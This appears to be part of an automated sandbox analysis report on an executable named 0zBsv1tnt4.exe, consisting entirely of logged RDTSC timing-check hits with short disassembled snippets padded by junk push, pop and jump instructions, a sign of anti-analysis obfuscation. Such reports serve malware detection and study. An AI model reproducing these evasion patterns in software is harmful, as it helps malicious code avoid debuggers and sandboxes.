Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA19BB second address: BA19C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA1E2C second address: BA1E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22D01ECCBh 0x00000009 jmp 00007FC22D01ECCCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA1E47 second address: BA1E4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA2238 second address: BA2259 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22D01ECD7h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA23DA second address: BA23E0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA23E0 second address: BA23F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC22D01ECCDh 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA259F second address: BA25C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FC22CC1B8A6h 0x00000010 jmp 00007FC22CC1B8B5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA25C4 second address: BA25D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FC22D01ECC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA25D9 second address: BA25EC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA277F second address: BA2785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA2785 second address: BA278B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA2A77 second address: BA2A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22D01ECCAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA2A85 second address: BA2A8B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA2A8B second address: BA2A9C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007FC22D01ECC6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA2A9C second address: BA2AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA2EF1 second address: BA2EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA2EF5 second address: BA2F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FC22CC1B8BAh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA2F1B second address: BA2F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA2F1F second address: BA2F23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA810F second address: BA811D instructions: 0x00000000 rdtsc 0x00000002 js 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BA8388 second address: BA83C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FC22CC1B8C3h 0x0000000f jmp 00007FC22CC1B8B7h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B1B262 second address: B1B28D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007FC22D01ECD9h 0x0000000c pushad 0x0000000d jnc 00007FC22D01ECC6h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BB02A1 second address: BB02B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FC22CC1B8A6h 0x0000000e jbe 00007FC22CC1B8A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BB02B5 second address: BB02C6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FC22D01ECCEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BB02C6 second address: BB02CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BB02CC second address: BB02D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FC22D01ECC6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BB08C6 second address: BB08CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BB08CB second address: BB08EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC22D01ECC6h 0x0000000a jmp 00007FC22D01ECD9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BB08EE second address: BB0902 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC22CC1B8AAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BB0902 second address: BB0911 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BB54F5 second address: BB550A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BB550A second address: BB5510 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BB5510 second address: BB5554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FC22CC1B8B9h 0x0000000c jmp 00007FC22CC1B8ADh 0x00000011 jns 00007FC22CC1B8A6h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC22CC1B8ACh 0x0000001e jmp 00007FC22CC1B8B7h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B61776 second address: B6177C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B6177C second address: B61801 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, dword ptr [ebp+1248B8E2h] 0x00000011 mov edi, dword ptr [ebp+12457ACAh] 0x00000017 add eax, ebx 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FC22CC1B8A8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov edi, ebx 0x00000035 push eax 0x00000036 jnl 00007FC22CC1B8B4h 0x0000003c mov dword ptr [esp], eax 0x0000003f jmp 00007FC22CC1B8B0h 0x00000044 jmp 00007FC22CC1B8AFh 0x00000049 push 00000004h 0x0000004b js 00007FC22CC1B8ACh 0x00000051 sub dword ptr [ebp+122D261Eh], esi 0x00000057 nop 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b push edi 0x0000005c pop edi 0x0000005d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BB644E second address: BB645E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 js 00007FC22D01ECEAh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BB645E second address: BB6464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BB6464 second address: BB6468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BBA6E7 second address: BBA702 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BBA702 second address: BBA72A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD6h 0x00000007 ja 00007FC22D01ECC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007FC22D01ECD2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BBA72A second address: BBA738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC22CC1B8A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BBA738 second address: BBA73E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BBA73E second address: BBA742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BBA742 second address: BBA746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BB9B25 second address: BB9B2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BB9B2E second address: BB9B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BB9B34 second address: BB9B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BBBE9A second address: BBBEA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BBBEA3 second address: BBBEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BC4170 second address: BC4187 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC22D01ECCDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BC4187 second address: BC418B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BC2181 second address: BC2187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BC2187 second address: BC218D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BC218D second address: BC2195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BC2757 second address: BC2775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push ebx 0x0000000a jmp 00007FC22CC1B8B2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BC2CF9 second address: BC2CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BC2CFE second address: BC2D0E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007FC22CC1B8A6h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BC2D0E second address: BC2D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BC32C1 second address: BC32C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BC32C7 second address: BC3306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FC22D01ECD3h 0x00000010 jmp 00007FC22D01ECCEh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 je 00007FC22D01ECC6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BC3306 second address: BC330A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BC330A second address: BC3310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BC3310 second address: BC3333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC22CC1B8B8h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BC8C1A second address: BC8C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22D01ECCDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BC8C2B second address: BC8C39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BC8C39 second address: BC8C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BC8C3F second address: BC8C45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BC8C45 second address: BC8C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BCBE06 second address: BCBE1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AFh 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FC22CC1B8A6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BCBF5B second address: BCBF5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BCBF5F second address: BCBF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FC22CC1B8A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BCC09D second address: BCC0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BCC0A3 second address: BCC0D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B7h 0x00000009 popad 0x0000000a jmp 00007FC22CC1B8B1h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BCC222 second address: BCC252 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC22D01ECD6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BCC37B second address: BCC381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BCC655 second address: BCC65C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BD45E0 second address: BD45E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BD329A second address: BD32A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BD32A0 second address: BD32A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BD2341 second address: BD2358 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FC22D01ECCEh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BD2358 second address: BD2370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BD9D8D second address: BD9D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BD9D91 second address: BD9DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BD9DAD second address: BD9DC9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC22D01ECD2h 0x00000008 jc 00007FC22D01ECE5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BDCC66 second address: BDCC6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BDCC6A second address: BDCC70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BE09D4 second address: BE09DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BE09DA second address: BE09DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BE09DE second address: BE0A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FC22CC1B8C0h 0x0000000c jmp 00007FC22CC1B8B8h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jc 00007FC22CC1B8C0h 0x0000001a pushad 0x0000001b jc 00007FC22CC1B8A6h 0x00000021 jng 00007FC22CC1B8A6h 0x00000027 jc 00007FC22CC1B8A6h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BE2E3E second address: BE2E57 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FC22D01ECD0h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BE2C92 second address: BE2CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BE2CAC second address: BE2CC2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC22D01ECC6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: BE2CC2 second address: BE2CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
